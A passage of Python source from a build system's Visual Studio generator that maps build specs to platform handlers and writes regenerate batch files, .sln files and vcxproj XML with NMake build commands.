})\n\t\t\t\tself.platformIntermediateDirPath.update({ buildSpec: \"\" })\n\t\t\t\tself.platformIncludePaths.update({ buildSpec: [] })\n\t\t\t\tself.platformDefines.update({ buildSpec: [] })\n\t\t\t\tself.platformCxxLanguageStandard.update({ buildSpec: None })\n\n\t\t\t# Merge the data from the generator.\n\t\t\tif generator:\n\t\t\t\tself.platformGenerator[buildSpec] = generator\n\t\t\t\tself.platformIncludePaths[buildSpec].extend(list(generator.includeDirectories))\n\t\t\t\tself.platformDefines[buildSpec].extend(list(generator.defines))\n\t\t\t\tself.platformCxxLanguageStandard[buildSpec] = generator.cxxLanguageStandard\n\n\t\t\t\tprojectData = generator.projectData\n\n\t\t\t\tself.platformOutputType[buildSpec] = projectData.projectType\n\t\t\t\tself.platformOutputName[buildSpec] = projectData.outputName\n\t\t\t\tself.platformOutputDirPath[buildSpec] = os.path.abspath(projectData.outputDir)\n\t\t\t\tself.platformIntermediateDirPath[buildSpec] = os.path.abspath(projectData.intermediateDir)\n\n\t\t\t\t# Added items for each source file in the project.\n\t\t\t\tfor filePath in generator.sourceFiles:\n\t\t\t\t\tfileStructure = _getSourceFileProjectStructure(projectData.workingDirectory, projectData.sourceDirs, filePath, ENABLE_FILE_TYPE_FOLDERS)\n\t\t\t\t\tparentMap = self.items\n\n\t\t\t\t\t# Get the file item name, then remove it from the project structure.\n\t\t\t\t\tfileItemName = fileStructure[-1]\n\t\t\t\t\tfileStructure = fileStructure[:-1]\n\t\t\t\t\tparentSegments = []\n\n\t\t\t\t\t# Build the hierarchy of folder items for the current file.\n\t\t\t\t\tfor segment in fileStructure:\n\t\t\t\t\t\tif segment not in parentMap:\n\t\t\t\t\t\t\tparentMap.update({ segment: VsProjectItem(segment, os.sep.join(parentSegments), VsProjectItemType.Folder, parentSegments) })\n\n\t\t\t\t\t\tparentMap = parentMap[segment].children\n\n\t\t\t\t\t\t# Keep track of each segment along the way since each item (including the folder items)\n\t\t\t\t\t\t# need to know their parent segements when the vcxproj.filters file is generated.\n\t\t\t\t\t\tparentSegments.append(segment)\n\n\t\t\t\t\tif fileItemName not in parentMap:\n\t\t\t\t\t\t# The current file item is new, so map it under the parent item.\n\t\t\t\t\t\tfileItem = VsProjectItem(fileItemName, os.path.dirname(filePath), VsProjectItemType.File, parentSegments)\n\n\t\t\t\t\t\tparentMap.update({ fileItemName: fileItem })\n\n\t\t\t\t\telse:\n\t\t\t\t\t\t# The current file item already exists, so get the original object for its mapping.\n\t\t\t\t\t\tfileItem = parentMap[fileItemName]\n\n\t\t\t\t\t# Update the set of supported platforms for the current file item.\n\t\t\t\t\tfileItem.supportedBuildSpecs.add(buildSpec)\n\n\nclass VsFileProxy(object):\n\t\"\"\"\n\tHandler for copying a temp file to it's final location.\n\t\"\"\"\n\tdef __init__(self, realFilePath, tempFilePath):\n\t\tself.realFilePath = realFilePath\n\t\tself.tempFilePath = tempFilePath\n\n\tdef Check(self):\n\t\t\"\"\"\n\t\tCheck the temp file to see if it differs from the output file, then copy if they don't match.\n\t\t\"\"\"\n\t\toutDirPath = os.path.dirname(self.realFilePath)\n\n\t\t# Create the output directory if it doesn't exist.\n\t\tif not os.access(outDirPath, os.F_OK):\n\t\t\tos.makedirs(outDirPath)\n\n\t\t# Open the input file and get a hash of its data.\n\t\twith open(self.tempFilePath, \"rb\") as inputFile:\n\t\t\tinputFileData = inputFile.read()\n\t\t\tinputHash = hashlib.md5()\n\n\t\t\tinputHash.update(inputFileData)\n\n\t\t\tinputHash = inputHash.hexdigest()\n\n\t\tif os.access(self.realFilePath, os.F_OK):\n\t\t\t# Open the output file and get a hash of its data.\n\t\t\twith open(self.realFilePath, \"rb\") as outputFile:\n\t\t\t\toutputFileData = outputFile.read()\n\t\t\t\toutputHash = hashlib.md5()\n\n\t\t\t\toutputHash.update(outputFileData)\n\n\t\t\t\toutputHash = outputHash.hexdigest()\n\n\t\telse:\n\t\t\t# The output file doesn't exist, so use an empty string to stand in for the hash.\n\t\t\toutputHash = \"\"\n\n\t\t# Do a consistency check using the MD5 hashes of the input and output files to determine if we\n\t\t# need to copy the data to the output file.\n\t\tif inputHash != outputHash:\n\t\t\tlog.Build(\"[WRITING] {}\".format(self.realFilePath))\n\n\t\t\twith open(self.realFilePath, \"wb\") as outputFile:\n\t\t\t\toutputFile.write(inputFileData)\n\t\t\t\toutputFile.flush()\n\t\t\t\tos.fsync(outputFile.fileno())\n\n\t\telse:\n\t\t\tlog.Build(\"[UP-TO-DATE] {}\".format(self.realFilePath))\n\n\t\tos.remove(self.tempFilePath)\n\n\ndef _evaluatePlatforms(generators, vsInstallInfo):\n\tglobal PLATFORM_HANDLERS\n\tglobal BUILD_SPECS\n\n\tif not PLATFORM_HANDLERS:\n\t\t# No platform handlers have been registered by user, so we can add reasonable defaults here.\n\t\tPLATFORM_HANDLERS.update({\n\t\t\t(\"android-gcc\", \"arm\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"arm64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"x86\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"x64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"mips\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"mips64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"arm\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"arm64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"x86\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"x64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"mips\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"mips64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"msvc\", \"x86\", ()): VsWindowsX86PlatformHandler,\n\t\t\t(\"msvc\", \"x64\", ()): VsWindowsX64PlatformHandler,\n\t\t\t(\"ps3\", \"cell\", ()): VsPs3PlatformHandler,\n\t\t\t(\"ps4\", \"x64\", ()): VsPs4PlatformHandler,\n\t\t\t(\"ps5\", \"x64\", ()): VsPs5PlatformHandler,\n\t\t\t(\"psvita\", \"arm\", ()): VsPsVitaPlatformHandler,\n\t\t})\n\n\t# Find all specs used by the generators.\n\tallFoundSpecs = { _createBuildSpec(gen) for gen in generators }\n\tallFoundTargets = sorted(list({ spec[2] for spec in allFoundSpecs }))\n\ttempHandlers = {}\n\n\t# Instantiate each registered platform handler.\n\tfor key, cls in PLATFORM_HANDLERS.items():\n\t\t# Convert the key to a list so we can modify it if necessary.\n\t\tkey = list(key)\n\n\t\tif not key[2]:\n\t\t\t# If there were no configs specified by the user, that is an indication to use all known configs.\n\t\t\tkey[2] = allFoundTargets\n\t\telse:\n\t\t\t# Of the configs provided by the user, trim them all down to only those we know about.\n\t\t\tkey[2] = [x for x in key[2] if x in allFoundTargets]\n\n\t\tallKeyConfigs = key[2]\n\n\t\t# Split out the configs so each one produces a different key. This will make dictionary lookups easier.\n\t\tfor config in allKeyConfigs:\n\t\t\tkey = (key[0], key[1], config)\n\t\t\ttempHandlers.update({ key: cls })\n\n\tsortedHandlerKeys = sorted(tempHandlers.keys())\n\n\tlog.Info(\"Found build specs in available projects: {}\".format(sorted(allFoundSpecs)))\n\tlog.Info(\"Build specs mapped to platform handlers: {}\".format(sortedHandlerKeys))\n\n\t# We have all the handlers stored in a temporary dictionary so we can refill them globally as we validate them.\n\tPLATFORM_HANDLERS = {}\n\n\tfoundVsPlatforms = set()\n\trejectedBuildSpecs = set()\n\n\t# Validate the platform handlers to make sure none of them overlap.\n\tfor key in sortedHandlerKeys:\n\t\t# Do not include specs that are not common to the available generators.\n\t\tif key in allFoundSpecs:\n\t\t\tcls = tempHandlers[key]\n\t\t\tvsPlatform = _createVsPlatform(key, cls)\n\t\t\tif vsPlatform in foundVsPlatforms:\n\t\t\t\trejectedBuildSpecs.add(key)\n\t\t\telse:\n\t\t\t\tfoundVsPlatforms.add(vsPlatform)\n\t\t\t\tPLATFORM_HANDLERS.update({ key: cls(key, vsInstallInfo) })\n\n\tif rejectedBuildSpecs:\n\t\tlog.Warn(\"Rejecting the following build specs since they are registered to overlapping Visual Studio platforms: {}\".format(sorted(rejectedBuildSpecs)))\n\n\t# Prune the generators down to a list with only supported platforms.\n\tprunedGenerators = [x for x in generators if _createBuildSpec(x) in PLATFORM_HANDLERS]\n\n\tfoundBuildSpecs = set()\n\n\t# Compile a list of all remaining build specs out of the pruned generator.\n\tfor gen in prunedGenerators:\n\t\tfoundBuildSpecs.add(_createBuildSpec(gen))\n\n\tBUILD_SPECS = sorted(foundBuildSpecs)\n\n\tif PLATFORM_HANDLERS:\n\t\tlog.Info(\"Using Visual Studio platforms: {}\".format(\", \".join(sorted({ handler.GetVisualStudioPlatformName() for _, handler in PLATFORM_HANDLERS.items() }))))\n\n\treturn prunedGenerators\n\n\ndef _createRegenerateBatchFile(outputRootPath):\n\tglobal MAKEFILE_PATH\n\tglobal REGEN_FILE_PATH\n\n\toutputFilePath = os.path.join(outputRootPath, \"regenerate_solution.bat\")\n\tpythonExePath = os.path.normcase(sys.executable)\n\tmakefilePath = _constructRelPath(MAKEFILE_PATH, outputRootPath)\n\tcmdLine = GetCommandLineString()\n\n\ttmpFd, tempFilePath = tempfile.mkstemp(prefix=\"vs_regen_\")\n\n\t# Write the batch file data.\n\twith os.fdopen(tmpFd, \"w\") as f:\n\t\twriteLineToFile = lambda text: f.write(\"{}\\n\".format(text))\n\n\t\twriteLineToFile(\"@echo off\")\n\t\twriteLineToFile(\"SETLOCAL\")\n\t\twriteLineToFile(\"PUSHD %~dp0\")\n\t\twriteLineToFile(\"\\\"{}\\\" \\\"{}\\\" {}\".format(pythonExePath, makefilePath, cmdLine))\n\t\twriteLineToFile(\"POPD\")\n\n\t\tf.flush()\n\t\tos.fsync(f.fileno())\n\n\tREGEN_FILE_PATH = outputFilePath\n\tproxy = VsFileProxy(REGEN_FILE_PATH, tempFilePath)\n\n\tproxy.Check()\n\n\ndef _buildProjectHierarchy(generators):\n\tglobal BUILD_SPECS\n\n\trootProject = VsProject(None, \"\", VsProjectType.Root)\n\tbuildAllProject = VsProject(\"(BUILD_ALL)\", \"\", VsProjectType.Standard)\n\tregenProject = VsProject(\"(REGENERATE_SOLUTION)\", \"\", VsProjectType.Standard)\n\n\t# Set the default project special types so they can be identified.\n\tbuildAllProject.subType = VsProjectSubType.BuildAll\n\tregenProject.subType = VsProjectSubType.Regen\n\n\t# The default projects can be used with all build specs.\n\tfor buildSpec in BUILD_SPECS:\n\t\tbuildAllProject.MergeProjectData(buildSpec, None)\n\t\tregenProject.MergeProjectData(buildSpec, None)\n\n\t# Add the default projects to the hierarchy.\n\trootProject.children.update({\n\t\tbuildAllProject.name: buildAllProject,\n\t\tregenProject.name: regenProject,\n\t})\n\n\t# Parse the data from each project generator.\n\tfor gen in generators:\n\t\tbuildSpec = _createBuildSpec(gen)\n\t\tparent = rootProject\n\n\t\t# Find the appropriate parent project if this project is part of a group.\n\t\tfor segment in gen.groupSegments:\n\t\t\t# If the current segment in the group is not represented in the current parent's child project list yet,\n\t\t\t# create it and insert it.\n\t\t\tif segment not in parent.children:\n\t\t\t\tparent.children.update({ segment: VsProject(segment, os.path.join(parent.relFilePath, segment), VsProjectType.Filter) })\n\n\t\t\tparent = parent.children[segment]\n\n\t\tprojName = gen.projectData.name\n\n\t\tif projName not in parent.children:\n\t\t\t# The current project does not exist yet, so create it and map it as a child to the parent project.\n\t\t\tproj = VsProject(projName, parent.relFilePath, VsProjectType.Standard)\n\t\t\tparent.children.update({ projName: proj })\n\n\t\telse:\n\t\t\t# Get the existing project entry from the parent.\n\t\t\tproj = parent.children[projName]\n\n\t\t# Merge the generator's platform data into the project.\n\t\tproj.MergeProjectData(buildSpec, gen)\n\n\treturn rootProject\n\n\ndef _buildFlatProjectList(rootProject):\n\tflatProjects = []\n\tprojectStack = [rootProject]\n\n\t# Build a flat list of all projects and filters.\n\twhile projectStack:\n\t\tproject = projectStack.pop(0)\n\n\t\t# Add each child project to the stack.\n\t\tfor projKey in sorted(list(project.children), key=lambda x: x.lower()):\n\t\t\tchildProject = project.children[projKey]\n\n\t\t\tflatProjects.append(childProject)\n\t\t\tprojectStack.append(childProject)\n\n\treturn flatProjects\n\n\ndef _buildFlatProjectItemList(rootItems):\n\tflatProjectItems = []\n\tdummyRootItem = VsProjectItem(None, None, None, None)\n\titemStack = [dummyRootItem]\n\n\t# Assign the input items to the dummy root.\n\tdummyRootItem.children = rootItems\n\n\t# Build a flat list of all projects and filters.\n\twhile itemStack:\n\t\titem = itemStack.pop(0)\n\n\t\t# Add each child project to the stack.\n\t\tfor projKey in sorted(list(item.children)):\n\t\t\tchildItem = item.children[projKey]\n\n\t\t\tflatProjectItems.append(childItem)\n\t\t\titemStack.append(childItem)\n\n\treturn flatProjectItems\n\n\ndef _writeSolutionFile(rootProject, outputRootPath, solutionName, vsInstallInfo):\n\tglobal PLATFORM_HANDLERS\n\tglobal BUILD_SPECS\n\n\tclass SolutionWriter(object): # pylint: disable=missing-docstring\n\t\tdef __init__(self, fileHandle):\n\t\t\tself.fileHandle = fileHandle\n\t\t\tself.indentation = 0\n\n\t\tdef Line(self, text): # pylint: disable=missing-docstring\n\t\t\tself.fileHandle.write(\"{}{}\\r\\n\".format(\"\\t\" * self.indentation, text))\n\n\t\[email protected]\n\t\tdef Section(self, sectionName, headerSuffix): # pylint: disable=missing-docstring\n\t\t\tself.Line(\"{}{}\".format(sectionName, headerSuffix))\n\n\t\t\tself.indentation += 1\n\n\t\t\ttry:\n\t\t\t\tyield\n\n\t\t\tfinally:\n\t\t\t\tself.indentation -= 1\n\n\t\t\t\tself.Line(\"End{}\".format(sectionName))\n\n\trealFilePath = os.path.join(outputRootPath, \"{}.sln\".format(solutionName))\n\ttmpFd, tempFilePath = tempfile.mkstemp(prefix=\"vs_sln_\")\n\n\t# Close the file since it needs to be re-opened with a specific encoding.\n\tos.close(tmpFd)\n\n\t# Visual Studio solution files need to be UTF-8 with the byte order marker because Visual Studio is VERY picky\n\t# about these files. If ANYTHING is missing or not formatted properly, the Visual Studio version selector may\n\t# not open the with the right version or Visual Studio itself may refuse to even attempt to load the file.\n\twith codecs.open(tempFilePath, \"w\", \"utf-8-sig\") as f:\n\t\twriter = SolutionWriter(f)\n\n\t\twriter.Line(\"\") # Required empty line.\n\t\twriter.Line(\"Microsoft Visual Studio Solution File, Format Version {}\".format(vsInstallInfo.fileVersion))\n\t\twriter.Line(\"# Visual Studio {}\".format(vsInstallInfo.versionId))\n\n\t\tflatProjectList = _buildFlatProjectList(rootProject)\n\n\t\t# Write out the initial setup data for each project and filter.\n\t\tfor project in flatProjectList:\n\t\t\tdata = \"(\\\"{}\\\") = \\\"{}\\\", \\\"{}\\\", \\\"{}\\\"\".format(project.slnTypeGuid, project.name, project.GetVcxProjFilePath(), project.guid)\n\n\t\t\twith writer.Section(\"Project\", data):\n\t\t\t\tpass\n\n\t\t# Begin setting the global configuration data.\n\t\twith writer.Section(\"Global\", \"\"):\n\n\t\t\t# Write out the build specs supported by this solution.\n\t\t\twith writer.Section(\"GlobalSection\", \"(SolutionConfigurationPlatforms) = preSolution\"):\n\t\t\t\tvsPlatforms = set()\n\t\t\t\tfor buildSpec in BUILD_SPECS:\n\t\t\t\t\thandler = PLATFORM_HANDLERS[buildSpec]\n\t\t\t\t\tvsPlatform = _createVsPlatform(buildSpec, handler)\n\n\t\t\t\t\tvsPlatforms.add(vsPlatform)\n\n\t\t\t\t# Output the platforms sorted case-insensitive as Visual Studio expects.\n\t\t\t\tfor vsPlatform in sorted(vsPlatforms, key=lambda x: x.lower()):\n\t\t\t\t\twriter.Line(\"{0} = {0}\".format(vsPlatform))\n\n\t\t\t# Write out the supported project-to-spec mappings.\n\t\t\twith writer.Section(\"GlobalSection\", \"(ProjectConfigurationPlatforms) = postSolution\"):\n\t\t\t\tfor project in flatProjectList:\n\t\t\t\t\t# Only standard projects should be listed here.\n\t\t\t\t\tif project.projType == VsProjectType.Standard:\n\t\t\t\t\t\tvsPlatforms = set()\n\t\t\t\t\t\tfor buildSpec in BUILD_SPECS:\n\t\t\t\t\t\t\thandler = PLATFORM_HANDLERS[buildSpec]\n\t\t\t\t\t\t\tvsPlatform = _createVsPlatform(buildSpec, handler)\n\n\t\t\t\t\t\t\tvsPlatforms.add(vsPlatform)\n\n\t\t\t\t\t\t# Output the platforms sorted case-insensitive as Visual Studio expects.\n\t\t\t\t\t\tfor vsPlatform in sorted(vsPlatforms, key=lambda x: x.lower()):\n\t\t\t\t\t\t\twriter.Line(\"{0}.{1}.ActiveCfg = {1}\".format(project.guid, vsPlatform))\n\n\t\t\t\t\t\t\t# Only enable the BuildAll project. This will make sure the global build command only\n\t\t\t\t\t\t\t# builds this project and none of the others (which can still be selectively built).\n\t\t\t\t\t\t\tif project.subType == VsProjectSubType.BuildAll:\n\t\t\t\t\t\t\t\twriter.Line(\"{0}.{1}.Build.0 = {1}\".format(project.guid, vsPlatform))\n\n\t\t\t# Write out any standalone solution properties.\n\t\t\twith writer.Section(\"GlobalSection\", \"(SolutionProperties) = preSolution\"):\n\t\t\t\twriter.Line(\"HideSolutionNode = FALSE\")\n\n\t\t\tnestedProjectsMappings = set()\n\t\t\tfor parentProject in flatProjectList:\n\t\t\t\tfor childProject in parentProject.children:\n\t\t\t\t\tnestedProjectsMappings.add(\"{} = {}\".format(childProject.guid, parentProject.guid))\n\n\t\t\t# Write out the mapping that describe the solution hierarchy.\n\t\t\tif nestedProjectsMappings:\n\t\t\t\twith writer.Section(\"GlobalSection\", \"(NestedProjects) = preSolution\"):\n\t\t\t\t\tfor mapping in sorted(nestedProjectsMappings):\n\t\t\t\t\t\twriter.Line(mapping)\n\n\t\tf.flush()\n\t\tos.fsync(f.fileno())\n\n\t# Transfer the temp file to the final output location.\n\tVsFileProxy(realFilePath, tempFilePath).Check()\n\n\ndef _saveXmlFile(realFilePath, rootNode):\n\t# Grab a string of the XML document we've created and save it.\n\txmlString = PlatformString(ET.tostring(rootNode))\n\n\t# Use minidom to reformat the XML since ElementTree doesn't do it for us.\n\tformattedXmlString = PlatformString(minidom.parseString(xmlString).toprettyxml(\"\\t\", \"\\n\", encoding = \"utf-8\"))\n\n\ttmpFd, tempFilePath = tempfile.mkstemp(prefix=\"vs_vcxproj_\")\n\n\t# Write the temp xml file data.\n\twith os.fdopen(tmpFd, \"w\") as f:\n\t\tf.write(formattedXmlString)\n\n\tVsFileProxy(realFilePath, tempFilePath).Check()\n\n\ndef _writeMainVcxProj(outputRootPath, project, globalPlatformHandlers):\n\toutputFilePath = os.path.join(outputRootPath, project.GetVcxProjFilePath())\n\toutputDirPath = os.path.dirname(outputFilePath)\n\n\t# Create the root XML node with the default data.\n\trootXmlNode = _createRootXmlNode(\"Project\")\n\trootXmlNode.set(\"DefaultTargets\", \"Build\")\n\trootXmlNode.set(\"ToolsVersion\", \"4.0\")\n\trootXmlNode.set(\"xmlns\", \"http://schemas.microsoft.com/developer/msbuild/2003\")\n\n\t_makeXmlCommentNode(rootXmlNode, \"Project header\")\n\n\t# Write any top-level information a generator platform may require.\n\tfor _, platformHandler in globalPlatformHandlers.items():\n\t\tplatformHandler.WriteGlobalHeader(rootXmlNode, project)\n\n\t_makeXmlCommentNode(rootXmlNode, \"Project configurations\")\n\n\titemGroupXmlNode = _addXmlNode(rootXmlNode, \"ItemGroup\")\n\titemGroupXmlNode.set(\"Label\", \"ProjectConfigurations\")\n\n\t# Write the project configurations.\n\tfor buildSpec in BUILD_SPECS:\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\tplatformHandler.WriteProjectConfiguration(itemGroupXmlNode, project, buildSpec, _getVsConfigName(buildSpec))\n\n\t_makeXmlCommentNode(rootXmlNode, \"Project files\")\n\n\t# Write the project's files.\n\tflatProjectItems = _buildFlatProjectItemList(project.items)\n\tflatProjectItems = [item for item in flatProjectItems if item.itemType == VsProjectItemType.File]\n\tgroupedProjectItems = {}\n\n\t# Group the project file items by XML tag.\n\tfor item in flatProjectItems:\n\t\tif item.tag not in groupedProjectItems:\n\t\t\tgroupedProjectItems.update({ item.tag: [] })\n\n\t\tgroupedProjectItems[item.tag].append(item)\n\n\t# Write out each item for each tagged group.\n\tfor key in sorted(groupedProjectItems.keys()):\n\t\tprojectItems = groupedProjectItems[key]\n\t\titemGroupXmlNode = _addXmlNode(rootXmlNode, \"ItemGroup\")\n\n\t\tfor item in projectItems:\n\t\t\tsourceFileXmlNode = _addXmlNode(itemGroupXmlNode, item.tag)\n\t\t\tsourceFileXmlNode.set(\"Include\", _constructRelPath(os.path.join(item.dirPath, item.name), outputDirPath))\n\n\t\t\texcludeBuildSpecs = set(BUILD_SPECS).difference(item.supportedBuildSpecs)\n\t\t\tvsExcludedBuildTargets = []\n\n\t\t\tfor buildSpec in excludeBuildSpecs:\n\t\t\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\t\t\tvsConfig = _getVsConfigName(buildSpec)\n\t\t\t\tvsPlatformName = platformHandler.GetVisualStudioPlatformName()\n\t\t\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\t\t\tvsExcludedBuildTargets.append(vsBuildTarget)\n\n\t\t\tvsExcludedBuildTargets = sorted(vsExcludedBuildTargets, key=lambda x: x.lower())\n\n\t\t\t# Exclude the file item for each unsupported build spec.\n\t\t\tfor vsBuildTarget in vsExcludedBuildTargets:\n\t\t\t\texcludeXmlNode = _addXmlNode(sourceFileXmlNode, \"ExcludedFromBuild\")\n\t\t\t\texcludeXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\t\t\t\texcludeXmlNode.text = \"true\"\n\n\t_makeXmlCommentNode(rootXmlNode, \"Project global properties\")\n\n\t# Add the global property group.\n\tpropertyGroupXmlNode = _addXmlNode(rootXmlNode, \"PropertyGroup\")\n\tpropertyGroupXmlNode.set(\"Label\", \"Globals\")\n\n\t_makeXmlCommentNode(rootXmlNode, \"Import properties\")\n\n\timportXmlNode = _addXmlNode(rootXmlNode, \"Import\")\n\timportXmlNode.set(\"Project\", r\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\")\n\n\tprojectGuidXmlNode = _addXmlNode(propertyGroupXmlNode, \"ProjectGuid\")\n\tprojectGuidXmlNode.text = project.guid\n\n\tnamespaceXmlNode = _addXmlNode(propertyGroupXmlNode, \"RootNamespace\")\n\tnamespaceXmlNode.text = project.name\n\n\t# We're not creating a native project, so Visual Studio needs to know this is a makefile project.\n\tkeywordXmlNode = _addXmlNode(propertyGroupXmlNode, \"Keyword\")\n\tkeywordXmlNode.text = \"MakeFileProj\"\n\n\t_makeXmlCommentNode(rootXmlNode, \"Platform config property groups\")\n\n\t# Write the config property groups for each platform.\n\tfor buildSpec in BUILD_SPECS:\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\tplatformHandler.WriteConfigPropertyGroup(rootXmlNode, project, buildSpec, _getVsConfigName(buildSpec))\n\n\t_makeXmlCommentNode(rootXmlNode, \"Import properties (continued)\")\n\n\t# Write out the standard import property.\n\timportXmlNode = _addXmlNode(rootXmlNode, \"Import\")\n\timportXmlNode.set(\"Project\", r\"$(VCTargetsPath)\\Microsoft.Cpp.props\")\n\n\t# Write the import properties for each platform.\n\tfor buildSpec in BUILD_SPECS:\n\t\t# Skip build specs that are not supported by the project.\n\t\tif buildSpec not in project.supportedBuildSpecs:\n\t\t\tcontinue\n\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\tplatformHandler.WriteImportProperties(rootXmlNode, project, buildSpec, _getVsConfigName(buildSpec))\n\n\t_makeXmlCommentNode(rootXmlNode, \"Platform build commands\")\n\n\t# Write the build commands for each platform.\n\tfor buildSpec in BUILD_SPECS:\n\t\t# Skip build specs that are not supported by the project.\n\t\tif buildSpec not in project.supportedBuildSpecs:\n\t\t\tcontinue\n\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\textraBuildArgs = csbuild.GetSolutionArgs().replace(\",\", \" \")\n\n\t\tif project.subType == VsProjectSubType.Regen:\n\t\t\tbuildArgs = [\n\t\t\t\t\"\\\"{}\\\"\".format(_constructRelPath(REGEN_FILE_PATH, outputDirPath))\n\t\t\t]\n\n\t\t\trebuildArgs = buildArgs\n\t\t\tcleanArgs = buildArgs\n\n\t\telse:\n\t\t\tbuildArgs = [\n\t\t\t\t\"\\\"{}\\\"\".format(os.path.normcase(sys.executable)),\n\t\t\t\t\"\\\"{}\\\"\".format(_constructRelPath(MAKEFILE_PATH, outputDirPath)),\n\t\t\t\t\"-o\", \"\\\"{}\\\"\".format(buildSpec[0]),\n\t\t\t\t\"-a\", \"\\\"{}\\\"\".format(buildSpec[1]),\n\t\t\t\t\"-t\", \"\\\"{}\\\"\".format(buildSpec[2]),\n\t\t\t]\n\n\t\t\tif project.subType != VsProjectSubType.BuildAll:\n\t\t\t\tbuildArgs.extend([\n\t\t\t\t\t\"-p\", \"\\\"{}\\\"\".format(project.name),\n\t\t\t\t])\n\n\t\t\trebuildArgs = buildArgs + [\"-r\", extraBuildArgs]\n\t\t\tcleanArgs = buildArgs + [\"-c\", extraBuildArgs]\n\n\t\t\tbuildArgs.append(extraBuildArgs)\n\n\t\tbuildArgs = \" \".join([x for x in buildArgs if x])\n\t\trebuildArgs = \" \".join([x for x in rebuildArgs if x])\n\t\tcleanArgs = \" \".join([x for x in cleanArgs if x])\n\n\t\tvsConfig = _getVsConfigName(buildSpec)\n\t\tvsPlatformName = platformHandler.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tvsIncludePaths = platformHandler.GetIntellisenseIncludeSearchPaths(project, buildSpec) + \\\n\t\t\tsorted({ _constructRelPath(incPath, outputDirPath) for incPath in project.platformIncludePaths[buildSpec] })\n\n\t\tvsDefines = platformHandler.GetIntellisensePreprocessorDefinitions(project, buildSpec) + \\\n\t\t\tsorted(set(project.platformDefines[buildSpec])) + \\\n\t\t\t[\"$(NMakePreprocessorDefinitions)\"]\n\n\t\tpropertyGroupXmlNode = _addXmlNode(rootXmlNode, \"PropertyGroup\")\n\t\tpropertyGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\tbuildCommandXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeBuildCommandLine\")\n\t\tbuildCommandXmlNode.text = buildArgs\n\n\t\trebuildCommandXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeReBuildCommandLine\")\n\t\trebuildCommandXmlNode.text = rebuildArgs\n\n\t\tcleanCommandXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeCleanCommandLine\")\n\t\tcleanCommandXmlNode.text = cleanArgs\n\n\t\tincludePathXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeIncludeSearchPath\")\n\t\tincludePathXmlNode.text = \";\".join([x for x in vsIncludePaths if x])\n\n\t\tpreprocessorXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakePreprocessorDefinitions\")\n\t\tpreprocessorXmlNode.text = \";\".join([x for x in vsDefines if x])\n\n\t\tif project.subType == VsProjectSubType.Normal:\n\t\t\tbuildOutputType = project.platformOutputType[buildSpec]\n\t\t\tbuildOutputName = project.platformOutputName[buildSpec]\n\t\t\tbuildOutputDirPath = project.platformOutputDirPath[buildSpec]\n\t\t\tbuildIntermediateDirPath = project.platformIntermediateDirPath[buildSpec]\n\n\t\t\toutputExtension = platformHandler.GetOutputExtensionIfDebuggable(buildOutputType)\n\t\t\tadditionalOptions = platformHandler.GetIntellisenseAdditionalOptions(project, buildSpec)\n\n\t\t\t# Only include the NMakeOutput extension if the current project build has a debuggable output type.\n\t\t\t# This is what Visual Studio will look for when attempting to debug.\n\t\t\tif outputExtension:\n\t\t\t\toutputXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeOutput\")\n\t\t\t\toutputXmlNode.text = _constructRelPath(os.path.join(buildOutputDirPath, \"{}{}\".format(buildOutputName, outputExtension)), outputDirPath)\n\n\t\t\t_addXmlNode(propertyGroupXmlNode, \"OutDir\").text = _constructRelPath(buildOutputDirPath, outputDirPath)\n\t\t\t_addXmlNode(propertyGroupXmlNode, \"IntDir\").text = _constructRelPath(buildIntermediateDirPath, outputDirPath)\n\n\t\t\tif additionalOptions:\n\t\t\t\t_addXmlNode(propertyGroupXmlNode, \"AdditionalOptions\").text = additionalOptions\n\n\t\telse:\n\t\t\t_addXmlNode(propertyGroupXmlNode, \"OutDir\").text = \".out\"\n\t\t\t_addXmlNode(propertyGroupXmlNode, \"IntDir\").text = \".int\"\n\n\t\tplatformHandler.WriteExtraPropertyGroupBuildNodes(propertyGroupXmlNode, project, buildSpec, vsConfig)\n\n\t_makeXmlCommentNode(rootXmlNode, \"Import targets\")\n\n\t# Write the global import targets.\n\t# MUST be before the \"Microsoft.Cpp.targets\" import!\n\tfor _, platformHandler in globalPlatformHandlers.items():\n\t\tplatformHandler.WriteGlobalImportTargets(rootXmlNode, project)\n\n\t_makeXmlCommentNode(rootXmlNode, \"Final import target; must always be the LAST import target!\")\n\n\timportXmlNode = _addXmlNode(rootXmlNode, \"Import\")\n\timportXmlNode.set(\"Project\", r\"$(VCTargetsPath)\\Microsoft.Cpp.targets\")\n\n\t_makeXmlCommentNode(rootXmlNode, \"Project footer\")\n\n\t# Write any trailing information needed by the project.\n\tfor _, platformHandler in 